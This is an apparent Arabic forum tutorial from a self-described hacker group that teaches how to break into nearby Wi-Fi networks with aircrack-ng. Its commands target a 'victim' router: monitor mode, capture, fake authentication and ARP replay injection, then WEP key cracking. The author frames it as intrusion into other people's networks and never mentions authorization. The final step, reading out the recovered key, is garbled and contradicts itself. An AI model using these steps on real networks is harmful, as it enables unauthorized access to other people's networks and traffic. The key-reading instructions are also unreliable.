بسم الله و السلام عليكم ورحمة الله

جميع الحقوق محفوظة

لا نقبل اي نسخ دون ذكر الكاتب مع المصدر (جيوش الهكر)

اليوم نشرج فقط aircrack-ng

و تنقسم هذه الاداة الى :

Aircrack-ng suite



airbase-ng -- Multi-purpose tool aimed at attacking clients as opposed to the Access Point (AP) itself.


aircrack-ng -- 802.11 WEP and WPA/WPA2-PSK key cracking program.


airdecap-ng -- Decrypt WEP/WPA/WPA2 capture files.


airdecloak-ng -- Remove WEP Cloaking™ from a packet capture file.


airdriver-ng -- Script providing information and allowing installation of wireless drivers.


airdrop-ng -- A rule based wireless deauthication tool.


aireplay-ng -- Inject and replay wireless frames.


airgraph-ng -- Graph wireless networks.


airmon-ng -- Enable and disable monitor mode on wireless interfaces.


airodump-ng -- Capture raw 802.11 frames.


airolib-ng -- Precompute WPA/WPA2 passphrases in a database to use it later with aircrack-ng.


airserv-ng -- Wireless card TCP/IP server which allows multiple application to use a wireless card.


airtun-ng -- Virtual tunnel interface creator.


easside-ng -- Auto-magic tool which allows you to communicate to an WEP-encrypted Access Point without knowing the key.


packetforge-ng -- Create various type of encrypted packets that can be used for injection.


tkiptun-ng -- Proof-of-concept implementation the WPA/TKIP attack: inject a few frames into a WPA TKIP network with QoS


wesside-ng -- Auto-magic tool which incorporates a number of techniques to seamlessly obtain a WEP key in minutes.


Other tools - WZCook and ivstools


و هذه دورة باللغة الاجنبية انصحكم بها

http://www.youtube.com/channel/UCs X...oK Ag/v ideo s


طبعا هذا لا يعني اني لن اشرح الادوات ... لا لا راح اشرحها بس مو كلها بس المهم

اهم اداة من ادوات ايركراك هي :

airmon-ng
airodump-ng
aireplay-ng
airdrop-ng
aircrack-ng

اول اداة ... هذي الاداة من اهم الادوات و لو من دونها لايمكن عمل اي شي

هذه الاداة لو كتبت في ال"الطرفية"(terminal) و تكتب "airmon-ng" راح تلاحظ يكتبلك كروت الوايرليس الموجودة عندك



الدرس الثالث الحرب الاكترونية
الان تلاحظ وجود wlan0 و هذه كارت الوايرليس تبعي لو مكانش موجود اي كارت واير ليس هذا لازم تدخل عل درس حل مشكلة الواير ليس و انشاء الله في الدرس القادم

والان حتى نبدي نخترق الوايرليس لازم نعرف انو الكرت الشبكة كبيرة و راح نعملها فرع

تسالون كيف اقولكم راح نكتب بالترمنال "الطرفية"

airmon-ng start wlan0

راح تلاحظ الصورة التالية



احنة الي يهمنا اخر سطر و الي هو "monitor mode enabled on mon0"

تمام الان ننسى wlan0 راح يكون كل شغلنا عل mon0

الان عملنا شبكة فرعية لسهولة العمل

خلص شغلنا عل airmon-ng

نجي عل airodump-ng

هذه الاداة وضيفتها اختراق الاشبكات + عرض الشبكات الموجودة حولك مع كل المعلومات

الان شوية ندرس الاداة لانها مهمة جدا

نكتب في ترمنال"الطرفية" airodump-ng

________________________________________

Airodump-ng 1.1 - (C) 2006-2010 Thomas d'Otreppe
Original work: Christophe Devine
Aircrack-ng

usage: airodump-ng <options> <interface>[,<interface>,...]

Options:
--ivs : Save only captured IVs
--gpsd : Use GPSd
--write <prefix> : Dump file prefix
-w : same as --write
--beacons : Record all beacons in dump file
--update <secs> : Display update delay in seconds
--showack : Prints ack/cts/rts statistics
-h : Hides known stations for --showack
-f <msecs> : Time in ms between hopping channels
--berlin <secs> : Time before removing the AP/client
from the screen when no more packets
are received (Default: 120 seconds)
-r <file> : Read packets from that file
-x <msecs> : Active Scanning Simulation
--output-format
<formats> : Output format. Possible values:
pcap, ivs, csv, gps, kismet, netxml

Filter options:
--encrypt <suite> : Filter APs by cipher suite
--netmask <netmask> : Filter APs by mask
--bssid <bssid> : Filter APs by BSSID
-a : Filter unassociated clients

By default, airodump-ng hop on 2.4GHz channels.
You can make it capture on other/specific channel(s) by using:
--channel <channels>: Capture on specific channels
--band <abg> : Band on which airodump-ng should hop
-C <frequencies> : Uses these frequencies in MHz to hop
--cswitch <method> : Set channel switching method
0 : FIFO (default)
1 : Round Robin
2 : Hop on last
-s : same as --cswitch

--help : Displays this usage screen

No interface specified.

______________________________________________

خخخخخخخخخ اكيد الكل ميفتهم .... هسة افهمكم المهم بس

لو تكتب في ترمنال

airodump-ng mon0

راح يعرضلك الشبكات الموجودة حولك

مثال :



لون الاحمر هو اسماء الشبكات الموجودة حولك
لون الاصفر نوع تشفير الباس
لون الازرق هو ماك ادرس حق الراوتر
لون اخضر هو بوكيت المرسلة والمستقبلة و الضائعة
لان نشرح الوردي و الازرق الفاتح

راح تشوفون مكتوب bssid و station

الاماك ادرس الموجود في الازرق الفاتح هي راوتر

و الماك ادرس المجودة في لون الوردي هي اجهزة موجودة عل هذا الراوتر مثلا انا ماك ادرس راوتري عليها جهاز واحد وهي جهازي

المهم خلصنا من هذا نجي عل امر غيرها و هي لو كتبنا في ترمنال

airodump-ng --channel [Victim channel] --write [NAME] --bssid [Victim BSSID] [your interface]

الان هذه طريقة جلب باس لكنها تكون مشفرة

تكتبون بدل هذه الكلمات حسب نوع الشبكة الي حولك

نسيت اخبركم عن كيفية استغراج [Victim channel] و هي تكون بين لون اصفر و الازرق تكتب تحت CH

و ثاني شي [NAME] نكتب هون اي سم تريد بس يكون ما فيها فراغات

و ثالث شي [Victim BSSID] نكتب الماك ادرس حق الراوتر

و رابع شي [your interface] نكتب اهنا mon0 نكتب النت الي عملناها فرعي و دائما تكون mon0

مثال : airodump-ng --channel 11 --write shayar --bssid 11:22:33:44:55:66 mon0]

الان نضغط انتر

و نفتح ترمنال جديد

و الان نروح عل اداة aireplay-ng و نكتبها في ترمنال اسم الاداة

Aireplay-ng 1.1 - (C) 2006, 2007, 2008, 2009 Thomas d'Otreppe
Original work: Christophe Devine
Aircrack-ng

usage: aireplay-ng <options> <replay interface>

Filter options:

-b bssid : MAC address, Access Point
-d dmac : MAC address, Destination
-s smac : MAC address, Source
-m len : minimum packet length
-n len : maximum packet length
-u type : frame control, type field
-v subt : frame control, subtype field
-t tods : frame control, To DS bit
-f fromds : frame control, From DS bit
-w iswep : frame control, WEP bit
-D : disable AP detection

Replay options:

-x nbpps : number of packets per second
-p fctrl : set frame control word (hex)
-a bssid : set Access Point MAC address
-c dmac : set Destination MAC address
-h smac : set Source MAC address
-g value : change ring buffer size (default: 8)
-F : choose first matching packet

Fakeauth attack options:

-e essid : set target AP SSID
-o npckts : number of packets per burst (0=auto, default: 1)
-q sec : seconds between keep-alives
-y prga : keystream for shared key auth
-T n : exit after retry fake auth request n time

Arp Replay attack options:

-j : inject FromDS packets

Fragmentation attack options:

-k IP : set destination IP in fragments
-l IP : set source IP in fragments

Test attack options:

-B : activates the bitrate test

Source options:

-i iface : capture packets from this interface
-r file : extract packets from this pcap file

Miscellaneous options:

-R : disable /dev/rtc usage

Attack modes (numbers can still be used):

--deauth count : deauthenticate 1 or all stations (-0)
--fakeauth delay : fake authentication with AP (-1)
--interactive : interactive frame selection (-2)
--arpreplay : standard ARP-request replay (-3)
--chopchop : decrypt/chopchop WEP packet (-4)
--fragment : generates valid keystream (-5)
--caffe-latte : query a client for new IVs (-6)
--cfrag : fragments against a client (-7)
--test : tests injection and quality (-9)

--help : Displays this usage screen

No replay interface specified.

طبعا الي يريد يدرس الاداة يقراها و احنة الي نريدها اختراق و راح ندرس الي بس نريدها


aireplay-ng -1 0 -a [Victrim BSSID] [your interface]

طبعا عارفين [Victrim BSSID] هي ماك ادرس حق الراوتر

و [your interface] هي mon0

الان نفتح ترمنال جديد

و

aireplay-ng -3 -b [Victim BSSID] [your interface]

ما راح اعيد و هيك يكون خلصنا جزء الاول نجي للجزء الثاني

و هي فك التشفير

الان لو فتحت مجلد root راح تلقا فيها ملفات جديدة
و الملفات مسمى عل الي كتبناه في [NAME]


هذه ملفات مشفرة تحتوي عل الباس نروح الى اداة aircrack-ng

و هذه الاداة يقوم بفك تشفير الباس او الملف بامدادات cap

و نقوم بكتابة

aircrack-ng -b [victrim bssid] [*.cap]

راح تلاقي الاداة يكشف التشفير
و راح يكتبلك



key found

و تلاحظ مكتوب الباس بين قوسين و انت شيل : و يصير الباس يعني مثلا انا طلعلي 11:33:44:88:sf:99

يعني الباس حق الشبكة هي sf9911334488

و خلص درسنا و الحمدالله

اخوكم شايار

للاستفسار : [email protected]

جميع الحقوق محفوظة ...الدرس الثاني ... الحرب الاكترونية